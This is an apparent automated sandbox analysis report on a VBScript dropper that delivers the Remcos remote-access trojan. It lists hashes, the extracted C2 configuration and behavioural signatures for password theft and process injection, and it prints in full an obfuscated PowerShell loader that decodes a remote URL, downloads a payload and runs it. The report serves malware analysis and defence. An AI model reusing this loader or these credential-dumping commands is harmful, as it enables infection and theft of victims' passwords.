Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2024 08:32
Static task
static1
Behavioral task
behavioral1
Sample
heteronymous.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
heteronymous.vbs
Resource
win10v2004-20241007-en
General
-
Target
heteronymous.vbs
-
Size
71KB
-
MD5
fc612d46cca59534577f51b16710b323
-
SHA1
b65ef6cf8e46d38e2ab287f6584c8d456c36202d
-
SHA256
c43aa71f1636522145ea3e384b2546d5a589260cd7a2cc42688dda5944215b68
-
SHA512
33d74f868914c55269f10af4680500ddbcbd9968207180e160e92eb981c2140deea18b47d58ecb592437cc397c6e61853850752455b21acd2f7071e6755b1f7a
-
SSDEEP
1536:ggz3v5pA6TiWl+GJFQdGJVfYRFSlntJOEDy:ggj5aUie+oQwJ5YRECEDy
Malware Config
Extracted
remcos
RemoteHost
154.216.18.62:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-D98D6X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4980-65-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/448-63-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3488-62-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3488-62-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/448-63-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 4 3340 powershell.exe 25 4972 msiexec.exe 27 4972 msiexec.exe 29 4972 msiexec.exe 30 4972 msiexec.exe 32 4972 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
pid Process 3340 powershell.exe 1140 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4972 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1140 powershell.exe 4972 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4972 set thread context of 448 4972 msiexec.exe 101 PID 4972 set thread context of 3488 4972 msiexec.exe 102 PID 4972 set thread context of 4980 4972 msiexec.exe 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3340 powershell.exe 3340 powershell.exe 1140 powershell.exe 1140 powershell.exe 1140 powershell.exe 448 msiexec.exe 448 msiexec.exe 4980 msiexec.exe 4980 msiexec.exe 448 msiexec.exe 448 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1140 powershell.exe 4972 msiexec.exe 4972 msiexec.exe 4972 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 4980 msiexec.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1436 wrote to memory of 3340 1436 WScript.exe 83 PID 1436 wrote to memory of 3340 1436 WScript.exe 83 PID 1140 wrote to memory of 4972 1140 powershell.exe 96 PID 1140 wrote to memory of 4972 1140 powershell.exe 96 PID 1140 wrote to memory of 4972 1140 powershell.exe 96 PID 1140 wrote to memory of 4972 1140 powershell.exe 96 PID 4972 wrote to memory of 448 4972 msiexec.exe 101 PID 4972 wrote to memory of 448 4972 msiexec.exe 101 PID 4972 wrote to memory of 448 4972 msiexec.exe 101 PID 4972 wrote to memory of 448 4972 msiexec.exe 101 PID 4972 wrote to memory of 3488 4972 msiexec.exe 102 PID 4972 wrote to memory of 3488 4972 msiexec.exe 102 PID 4972 wrote to memory of 3488 4972 msiexec.exe 102 PID 4972 wrote to memory of 3488 4972 msiexec.exe 102 PID 4972 wrote to memory of 4980 4972 msiexec.exe 103 PID 4972 wrote to memory of 4980 4972 msiexec.exe 103 PID 4972 wrote to memory of 4980 4972 msiexec.exe 103 PID 4972 wrote to memory of 4980 4972 msiexec.exe 103
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\heteronymous.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS CasnGramyUnmedNont,Unde$MegaSSiphpStereSkakcF krt AnerdenooTr,nf egrlNetvuIn eoLeisrmerki.alem.mpreTrekt.unde Ha,rKraf)';$Spectrofluorimeter=$Intuitionernes;Hypohyaline (Chirked ' Spu$UdkogUd ilBldgoSkarbBag.ATrkkLPubl:DummiBefobStore Spin FroHOlisoBesklEfteT ,haSByg FPa.nLta,ijBa,mTRefrELetuR PurN UnkEIn e2Co o0Supe1 yks=D.kk( suptKre.EsektsFo,fTSves- ndePb huablodtKlarHkara tak$EmposHosppNondEBudtCVandTPlanrs ibO uliF BolLdumpu SacO .inrSkdeIFrosMFr cEOvertCeroe Frur usl)');while (!$Ibenholtsfljterne201) {Hypohyaline (Chirked 'Hjae$Bryng A rlT nfo indb.emiaSmudl,ulg:NondiIsotnhibedRykksT,grk Lu yResed B enKo tiReinnre igG fteKr nnDebusSp d=Poly$P,ofANonipStadodroksE,fetend aBy ns RaniTr.ds.uto8Thr.9') ;Hypohyaline $Honorifical179;Hypohyaline (Chirked 'Ogh.S elltYmpnA MrkRGra tHete-Van s De.LUnfoEFjerEKbelpDdsd Allo4');Hypohyaline (Chirked ',jsk$SeriGEdgilUn uOFeltbIdolAGal lReda:SigniIndebCoune CapNA buHtrfooForbLHr vtOri sTri F UplL tupJStimtDe uE arrr ChaNw rmE Bra2Hagi0 ndk1Fast=Stra(UdbltRechEVestSs.idTTilb-VexipVikaaPa.lTHypohLes Ling$InvoS Malpwad,EPalaC PhaT IntrProloNotefAgt LAntiuunhuO Au.RDe.iIRenvm InteA.reT EufE SitRanti)') ;Hypohyaline (Chirked 'Imme$BadmGGasolBr mOSquibUdokaal eL s.o:ForgMFuglaVareT larAfsno AnkNEfte=Dist$BaraG,ediLAntiOl ndBPropaF rslSt.t: Kooi NonnoptitAdelEUpaarCub FSpreAGaricPatiT A,tICameOm.xon EliaSpecLJour+ O e+Bowl%Defe$ LarT BekHNedhiPlejC MarK IneSAmpuELnudTBag,. SencDi oO ammuTanaNLi eT') ;$Snyd=$thickset[$matron]}$Josines=293205;$Sensibiliseringens=30156;Hypohyaline (Chirked 'Opga$Drvag ubjl UdkoMazuBF jlABe pl oku: FanMHikkAUdrar Ko cP euiEfteODebin DisiOr,fTBe jIInfrc A r Frot=Arbe E,teG.setE ardT il-PallC Ko OMa.knPrect SkaeLoinnCrypt Kon Klap$S arsSk np BraEDiskc U sTSammrTapiOKny.fCos lErhvu Ateo mir HapIFlagMBortERefeT.elleSys,r');Hypohyaline (Chirked 'H rw$vaklgKrselChefo.helbFibeaVaadlSkal:OctaVBizouBrialJu,eg Maca EksrSuf,iF,kls nreU rirHerie.goidBunde ThesForl Ande= To Unun[AcidSStrayBa ns Bolt TileFejlmfuzz. nmeCOveroSal nFo,lv PlaeBl drTh atKurs]Inte:Inve:Un,eFG esrBalso AmtmHaemBSu eaBe,osOmkleWago6Ser,4InceS iptdromrSweei.uddnSunbg Cif(Tran$ MasMHm.gaOpinrTilecOn.uiBlegounspn Holi Al t NaniMa acAmts)');Hypohyaline (Chirked 'Aton$Bn sg DalLMalaOPalpbFutua egfLLder: mas,psinOberaD,mac VenKTrapSStu M on=Bu,b Imbr[C taSFortyAil,SO ertSavnEFlerm D c.KoncTInteEBaraxBrnetDrv ..ideE H lNPh,tcBehroUdmuDBetril.gaNBybeG Var]Slad: ,ac: F rALy.isWareC ,erInakni Sit.C rlG eneHalvtKr ksGrant ekgRundeiNoncNtringExpo( lai$Re oVBracuB ndLrowtG SkaAnrinR ogri UnwsTyskeObjurStume ,usdTillEPeriSUnel)');Hypohyaline (Chirked ' ca $ BilGEnkeLFremORho B P eaEk pL Thr: PresBli OC sevSeriE ebPLactUBestDPalae R.tnTaulS en= cha$TvrlSFremNEftea SkiCen,rKKnubSLens.Fls s elu PipBCo nsGardTManeR uctiDaahnC.oog,rek(Gero$Plu,jToffoEx,iSForeIBen n DexEHerrsF rm,Foul$ Sc S AccEStudnFo,kS Flai mskBHalvIEff lAfsliColeSamazENonmr TolITrvlNJoylgVeneE Disn ResSCapt)');Hypohyaline $Sovepudens;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo lkostoKaleaAffadAnsvFAbrai Re,l .ykeMult(Brin$ .miS CasnGramyUnmedNont,Unde$MegaSSiphpStereSkakcF krt AnerdenooTr,nf egrlNetvuIn eoLeisrmerki.alem.mpreTrekt.unde Ha,rKraf)';$Spectrofluorimeter=$Intuitionernes;Hypohyaline (Chirked ' Spu$UdkogUd ilBldgoSkarbBag.ATrkkLPubl:DummiBefobStore Spin FroHOlisoBesklEfteT ,haSByg FPa.nLta,ijBa,mTRefrELetuR PurN UnkEIn e2Co o0Supe1 yks=D.kk( suptKre.EsektsFo,fTSves- ndePb huablodtKlarHkara tak$EmposHosppNondEBudtCVandTPlanrs ibO uliF BolLdumpu SacO .inrSkdeIFrosMFr cEOvertCeroe Frur usl)');while (!$Ibenholtsfljterne201) {Hypohyaline (Chirked 'Hjae$Bryng A rlT nfo indb.emiaSmudl,ulg:NondiIsotnhibedRykksT,grk Lu yResed B enKo tiReinnre igG fteKr nnDebusSp d=Poly$P,ofANonipStadodroksE,fetend aBy ns RaniTr.ds.uto8Thr.9') ;Hypohyaline $Honorifical179;Hypohyaline (Chirked 'Ogh.S elltYmpnA MrkRGra tHete-Van s De.LUnfoEFjerEKbelpDdsd Allo4');Hypohyaline (Chirked ',jsk$SeriGEdgilUn uOFeltbIdolAGal lReda:SigniIndebCoune CapNA buHtrfooForbLHr vtOri sTri F UplL tupJStimtDe uE arrr ChaNw rmE Bra2Hagi0 ndk1Fast=Stra(UdbltRechEVestSs.idTTilb-VexipVikaaPa.lTHypohLes Ling$InvoS Malpwad,EPalaC PhaT IntrProloNotefAgt LAntiuunhuO Au.RDe.iIRenvm InteA.reT EufE SitRanti)') ;Hypohyaline (Chirked 'Imme$BadmGGasolBr mOSquibUdokaal eL s.o:ForgMFuglaVareT larAfsno AnkNEfte=Dist$BaraG,ediLAntiOl ndBPropaF rslSt.t: Kooi NonnoptitAdelEUpaarCub FSpreAGaricPatiT A,tICameOm.xon EliaSpecLJour+ O e+Bowl%Defe$ LarT BekHNedhiPlejC MarK IneSAmpuELnudTBag,. SencDi oO ammuTanaNLi eT') ;$Snyd=$thickset[$matron]}$Josines=293205;$Sensibiliseringens=30156;Hypohyaline (Chirked 'Opga$Drvag ubjl UdkoMazuBF jlABe pl oku: FanMHikkAUdrar Ko cP euiEfteODebin DisiOr,fTBe jIInfrc A r Frot=Arbe E,teG.setE ardT il-PallC Ko OMa.knPrect SkaeLoinnCrypt Kon Klap$S arsSk np BraEDiskc U sTSammrTapiOKny.fCos lErhvu Ateo mir HapIFlagMBortERefeT.elleSys,r');Hypohyaline (Chirked 'H rw$vaklgKrselChefo.helbFibeaVaadlSkal:OctaVBizouBrialJu,eg Maca EksrSuf,iF,kls nreU rirHerie.goidBunde ThesForl Ande= To Unun[AcidSStrayBa ns Bolt TileFejlmfuzz. nmeCOveroSal nFo,lv PlaeBl drTh atKurs]Inte:Inve:Un,eFG esrBalso AmtmHaemBSu eaBe,osOmkleWago6Ser,4InceS iptdromrSweei.uddnSunbg Cif(Tran$ MasMHm.gaOpinrTilecOn.uiBlegounspn Holi Al t NaniMa acAmts)');Hypohyaline (Chirked 'Aton$Bn sg DalLMalaOPalpbFutua egfLLder: mas,psinOberaD,mac VenKTrapSStu M on=Bu,b Imbr[C taSFortyAil,SO ertSavnEFlerm D c.KoncTInteEBaraxBrnetDrv ..ideE H lNPh,tcBehroUdmuDBetril.gaNBybeG Var]Slad: ,ac: F rALy.isWareC ,erInakni Sit.C rlG eneHalvtKr ksGrant ekgRundeiNoncNtringExpo( lai$Re oVBracuB ndLrowtG SkaAnrinR ogri UnwsTyskeObjurStume ,usdTillEPeriSUnel)');Hypohyaline (Chirked ' ca $ BilGEnkeLFremORho B P eaEk pL Thr: PresBli OC sevSeriE ebPLactUBestDPalae R.tnTaulS en= cha$TvrlSFremNEftea SkiCen,rKKnubSLens.Fls s elu PipBCo nsGardTManeR uctiDaahnC.oog,rek(Gero$Plu,jToffoEx,iSForeIBen n DexEHerrsF rm,Foul$ Sc S AccEStudnFo,kS Flai mskBHalvIEff lAfsliColeSamazENonmr TolITrvlNJoylgVeneE Disn ResSCapt)');Hypohyaline $Sovepudens;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fikycmtbpmbfucnogmuaifuynxczga"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qkprdeeudutkwjjspxgtlkppwemizluqgf"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3488
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\sfujew"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b8a507ea87f4db23962b175b90889f86
SHA1d7957c02ed987bbf866c98e4491a926b5453c58d
SHA256291a53a8822be2c1b654a400ccd6fbbbf90712d4eb2078ccd2d10824d4de4e2b
SHA51223c6774e1c2bb07e9eb814b60b040ebaea933bc664b9eebfa741495e89a8568ff86653b4efa58595fa94f7aff0216d132db96a871ca78600fea3e5c08b9d2bea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD516dfb23eaa7972c59c36fcbc0946093b
SHA11e9e3ff83a05131575f67e202d352709205f20f8
SHA25636c49c94327c8cadcad4c0d2b3a8f5162fc7bb86624923484476c5f7b960bc4c
SHA512a8b38b5e7bf886b78c5c7f01234b44647a252d4dfbcc06c99b863f8e160e3cfc151b2a83b8b49e09d13e8547419467da4bffbb8dee5fc6740032eb7c839d89dc
-
Filesize
421KB
MD5832be69b2c71215bd426016cdcfe1b4e
SHA14737a05a74fd1832646630a8d3b128583f1e06b2
SHA256dbc17f5b483df2a4678fd5e5dfcbe82f6733d713c2cecec18b7e44a233626408
SHA512e61af16146ed617ff419f1df0648ccbb7d96ed486e3651df606b286817b8fe58cf67a7e8783245b3261af8ca08d08a9091d78f916e4f2e7ebe0ae1f573573180